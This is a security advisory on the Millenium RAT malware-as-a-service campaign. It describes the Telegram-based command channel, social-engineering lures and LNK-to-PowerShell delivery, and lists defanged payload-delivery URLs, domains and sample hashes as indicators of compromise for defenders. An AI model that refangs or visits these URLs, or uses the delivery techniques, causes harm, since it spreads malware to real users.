Published on June 29, 2026
Millenium RAT Rewritten in C++ Infects 62,000+ Devices Across 160 Countries
Severity
High
Detail
Security researchers have identified a large-scale malware campaign involving Millenium RAT, that has infected more than 62,000 devices across over 160 countries. More than 39,000 infections occurred during the first quarter of 2026, indicating that the campaign is rapidly expanding. Initially identified by CYFIRMA in 2023, the malware has evolved into version 4, featuring a complete rewrite from .NET to native C++, significantly improving its stealth and reducing dependency on the .NET Framework.
According to Group-IB, the malware is operated by a threat cluster known as Y2K Operators and is offered as a Malware-as-a-Service (MaaS) platform. The malware is advertised on underground forums and GitHub under the developer alias “shinyenigma”, making it accessible to cybercriminals at a low subscription cost.
Millenium RAT targets Windows systems and communicates with attackers through the Telegram Bot API, eliminating the need for traditional command-and-control infrastructure. The malware loads encrypted configuration data containing Telegram bot credentials, persistence settings, and keylogger configurations, protected using Base64 encoding combined with a custom XOR algorithm to evade detection.
How?
The Y2K Operators rely heavily on social engineering rather than software vulnerabilities to infect victims. Threat actors distribute Millenium RAT disguised as cracked software, cryptocurrency utilities, credit card generators, hacking toolkits, and gaming-related applications to persuade users to execute malicious files.
In some campaigns, legitimate hacking tools and existing RAT builders are trojanized with Millenium RAT before being redistributed. Another observed technique involves malicious Windows shortcut (.LNK) files disguised as PDF documents. When opened, the shortcut silently executes PowerShell to download the RAT while displaying a decoy PDF to avoid raising suspicion. After installation, the malware disguises itself using legitimate-looking filenames such as svchost[.]exe, MsEdgeUpdate[.]exe, and Microsoft Antivirus[.]exe, making detection more difficult. All communications with operators are conducted through Telegram allowing malicious traffic to blend with legitimate HTTPS communications.
Indicator of Compromises (IoCs)
The following are examples of IoCs associated with the Millenium RAT campaign:
| Type | Indicator | Description |
| URL | hxxp://158[.]94[.]208[.]168/files/8514679081/DRTjyu7[.]exe | Millenium RAT payload delivery URL. |
| URL | hxxps://www[.]thesnapchatmodapk[.]com/update1[.]exe | Millenium RAT payload delivery URL |
| Domain | 75877[.]mcdir[.]me | Domain used to proxy Telegram Bot API requests. |
| Domain | blackhatusa[.]com | Distribution domain for multiple RAT payloads. |
| SHA-256 | 1d699a46339626db299548e32ed3a77eec267840c3de39b49caf38b88aeb150d | Millenium RAT sample. |
| SHA-256 | 2267d05dbd5e30c6dfcdde25731280dd755e689faa684bd21cfbef5281fd3e86 | Millenium RAT sample. |
Mitigation & Recommendations
The following mitigation measures are recommended to reduce the risk of compromise from the Millenium RAT campaign:
- Treat unexpected User Account Control (UAC) administrative prompts with high suspicion.
- Avoid downloading utilities, game mods, or files from unverified or third-party web repositories.
- Restrict daily operational tasks to non-administrator accounts.
- Keep operating systems and applications updated with the latest security patches.
- Enforce multi-factor authentication across accounts to shield backend resources if credentials are stolen.
Source